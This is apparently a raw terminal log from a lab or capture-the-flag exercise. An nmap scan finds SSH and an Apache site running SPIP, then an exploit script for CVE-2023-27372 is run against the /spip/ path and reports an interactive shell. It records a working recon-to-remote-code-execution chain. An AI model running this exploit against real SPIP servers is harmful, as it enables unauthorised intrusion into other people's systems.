nmap -sV -sC -v 10.49.147.252 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-16 02:28 EDT NSE: Loaded 157 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 02:28 Completed NSE at 02:28, 0.00s elapsed Initiating NSE at 02:28 Completed NSE at 02:28, 0.00s elapsed Initiating NSE at 02:28 Completed NSE at 02:28, 0.00s elapsed Initiating Ping Scan at 02:28 Scanning 10.49.147.252 [4 ports] Completed Ping Scan at 02:28, 0.24s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 02:28 Completed Parallel DNS resolution of 1 host. at 02:28, 0.00s elapsed Initiating SYN Stealth Scan at 02:28 Scanning 10.49.147.252 [1000 ports] Discovered open port 80/tcp on 10.49.147.252 Discovered open port 22/tcp on 10.49.147.252 Completed SYN Stealth Scan at 02:28, 2.13s elapsed (1000 total ports) Initiating Service scan at 02:28 Scanning 2 services on 10.49.147.252 Completed Service scan at 02:28, 6.53s elapsed (2 services on 1 host) NSE: Script scanning 10.49.147.252. Initiating NSE at 02:28 Completed NSE at 02:28, 6.30s elapsed Initiating NSE at 02:28 Completed NSE at 02:28, 0.84s elapsed Initiating NSE at 02:28 Completed NSE at 02:28, 0.00s elapsed Nmap scan report for 10.49.147.252 Host is up (0.21s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 e4:10:01:9d:a0:cf:81:bf:2f:de:c7:95:78:b7:a6:1a (RSA) | 256 35:87:52:45:57:3c:20:91:df:a5:e9:2b:89:70:e1:67 (ECDSA) |_ 256 84:f4:5f:b5:85:09:a8:97:2b:21:4d:20:f1:e9:37:fc (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-methods: |_ Supported Methods: POST OPTIONS HEAD GET |_http-title: Publisher's Pulse: SPIP Insights & Tips |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning. Initiating NSE at 02:28 Completed NSE at 02:28, 0.00s elapsed Initiating NSE at 02:28 Completed NSE at 02:28, 0.00s elapsed Initiating NSE at 02:28 Completed NSE at 02:28, 0.00s elapsed Read data files from: /usr/share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.40 seconds Raw packets sent: 1081 (47.540KB) | Rcvd: 1002 (40.088KB)
python CVE-2023-27372.py -u http://10.49.147.252/spip/ [+] The URL http://10.49.147.252/spip/ is vulnerable [!] Shell is ready, please type your commands UwU # ls